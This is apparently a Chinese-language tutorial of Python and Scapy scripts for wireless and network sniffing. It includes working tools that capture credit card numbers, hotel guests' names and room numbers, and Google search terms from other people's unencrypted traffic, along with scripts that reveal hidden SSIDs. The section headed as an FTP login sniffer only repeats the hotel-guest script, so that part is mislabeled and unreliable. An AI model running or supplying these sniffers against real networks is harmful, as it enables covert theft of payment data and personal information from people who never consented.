PyWifl 模块寻找wifi来源
# -*- coding: UTF-8 -*-
import pywifi
def bies():
wifi=pywifi.PyWiFi()#创建一个无限对象
ifaces=wifi.interfaces()[0]#取一个无线网卡
ifaces.scan()#扫描
bessis=ifaces.scan_results()
for i in range(len(bessis)):
print(bessis[i].ssid, bessis[i].signal)
bies()
Wifl 侦听模块
import os
from scapy.all import *
iface = "en0"
os.system("/usr/sbin/iwconfig " + iface + " mode monitor")
# Dump packets that are not beacons, probe request / responses
def dump_packet(pkt):
if not pkt.haslayer(Dot11Beacon) and \
not pkt.haslayer(Dot11ProbeReq) and \
not pkt.haslayer(Dot11ProbeResp):
print(pkt.summary())
if pkt.haslayer(Raw):
print(hexdump(pkt.load))
print("\n")
while True:
for channel in range(1, 14):
os.system("/usr/sbin/iwconfig " + iface + \
" channel " + str(channel))
print("Sniffing on channel " + str(channel))
sniff(iface=iface,
prn=dump_packet,
count=10,
timeout=3,
store=0)
用Scapy测试无线网卡的嗅探功能
测试嗅探无线网络的代码
#!/usr/bin/python
#coding=utf-8
from scapy.all import *
def pktPrint(pkt):
if pkt.haslayer(Dot11Beacon):
print '[+] Detected 802.11 Beacon Frame'
elif pkt.haslayer(Dot11ProbeReq):
print '[+] Detected 802.11 Probe Request Frame'
elif pkt.haslayer(TCP):
print '[+] Detected a TCP Packet'
elif pkt.haslayer(DNS):
print '[+] Detected a DNS Packet'
conf.iface = 'wlan0mon'
sniff(prn=pktPrint)
使用Python正则表达式嗅探信用卡信息
3种常用的信用卡:Visa、MasterCard和American Express。
#!/usr/bin/python
#coding=utf-8
import re
def findCreditCard(raw):
# American Express信用卡由34或37开头的15位数字组成
americaRE = re.findall('3[47][0-9]{13}', raw)
if americaRE:
print '[+] Found American Express Card: ' + americaRE[0]
def main():
tests = []
tests.append('I would like to buy 1337 copies of that dvd')
tests.append('Bill my card: 378282246310005 for \$2600')
for test in tests:
findCreditCard(test)
if __name__ == '__main__':
main()
接着就加入Scapy来嗅探TCP数据包实现嗅探功能:
#!/usr/bin/python
#coding=utf-8
import re
import optparse
from scapy.all import *
def findCreditCard(pkt):
raw = pkt.sprintf('%Raw.load%')
# American Express信用卡由34或37开头的15位数字组成
americaRE = re.findall('3[47][0-9]{13}', raw)
# MasterCard信用卡的开头为51~55,共16位数字
masterRE = re.findall('5[1-5][0-9]{14}', raw)
# Visa信用卡开头数字为4,长度为13或16位
visaRE = re.findall('4[0-9]{12}(?:[0-9]{3})?', raw)
if americaRE:
print '[+] Found American Express Card: ' + americaRE[0]
if masterRE:
print '[+] Found MasterCard Card: ' + masterRE[0]
if visaRE:
print '[+] Found Visa Card: ' + visaRE[0]
def main():
parser = optparse.OptionParser('[*]Usage: python creditSniff.py -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Credit Card Sniffer.'
sniff(filter='tcp', prn=findCreditCard, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
嗅探宾馆住客
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGuest(pkt):
raw = pkt.sprintf('%Raw.load%')
name = re.findall('(?i)LAST_NAME=(.*)&', raw)
room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
if name:
print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])
def main():
parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Hotel Guest Sniffer.'
sniff(filter='tcp', prn=findGuest, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
编写谷歌键盘记录器
Google搜索,由“q=”开始,中间是要搜索的字符串,并以“&”终止,字符“pg=”后接的是上一个搜索的内容。
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGoogle(pkt):
if pkt.haslayer(Raw):
payload = pkt.getlayer(Raw).load
if 'GET' in payload:
if 'google' in payload:
r = re.findall(r'(?i)\&q=(.*?)\&', payload)
if r:
search = r[0].split('&')[0]
search = search.replace('q=', '').replace('+', ' ').replace('%20', ' ')
print '[+] Searched For: ' + search
def main():
parser = optparse.OptionParser('[*]Usage: python googleSniff.py -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Google Sniffer.'
sniff(filter='tcp port 80', prn=findGoogle)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
嗅探FTP登录口令
#!/usr/bin/python
#coding=utf-8
import optparse
from scapy.all import *
def findGuest(pkt):
raw = pkt.sprintf('%Raw.load%')
name = re.findall('(?i)LAST_NAME=(.*)&', raw)
room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
if name:
print '[+] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])
def main():
parser = optparse.OptionParser('[*]Usage: python hotelSniff.py -i <interface>')
parser.add_option('-i', dest='interface', type='string', help='specify interface to listen on')
(options, args) = parser.parse_args()
if options.interface == None:
print parser.usage
exit(0)
else:
conf.iface = options.interface
try:
print '[*] Starting Hotel Guest Sniffer.'
sniff(filter='tcp', prn=findGuest, store=0)
except KeyboardInterrupt:
exit(0)
if __name__ == '__main__':
main()
侦听无线 802.11 Probe请求
#!/usr/bin/python
#utf-8
from scapy.all import *
interface = 'wlan0mon'
probeReqs = []
def sniffProbe(p):
if p.haslayer(Dot11ProbeReq):
netName = p.getlayer(Dot11ProbeReq).info
if netName not in probeReqs:
probeReqs.append(netName)
print '[+] Detected New Probe Request: ' + netName
sniff(iface=interface, prn=sniffProbe)
寻找隐藏网络的802.11信标
def sniffDot11(p):
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2
if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: with MAC:' + addr2
hiddenNets.append(addr2)
找出隐藏的802.11网络的网络名
#!/usr/bin/python
#coding=utf-8
import sys
from scapy import *
interface = 'wlan0mon'
hiddenNets = []
unhiddenNets = []
def sniffDot11(p):
if p.haslayer(Dot11ProbeResp):
addr2 = p.getlayer(Dot11).addr2
if (addr2 in hiddenNets) & (addr2 not in unhiddenNets):
netName = p.getlayer(Dot11ProbeResp).info
print '[+] Decloaked Hidden SSID : ' + netName + ' for MAC: ' + addr2
unhiddenNets.append(addr2)
if p.haslayer(Dot11Beacon):
if p.getlayer(Dot11Beacon).info == '':
addr2 = p.getlayer(Dot11).addr2
if addr2 not in hiddenNets:
print '[-] Detected Hidden SSID: with MAC:' + addr2
hiddenNets.append(addr2)
sniff(iface=interface, prn=sniffDot11)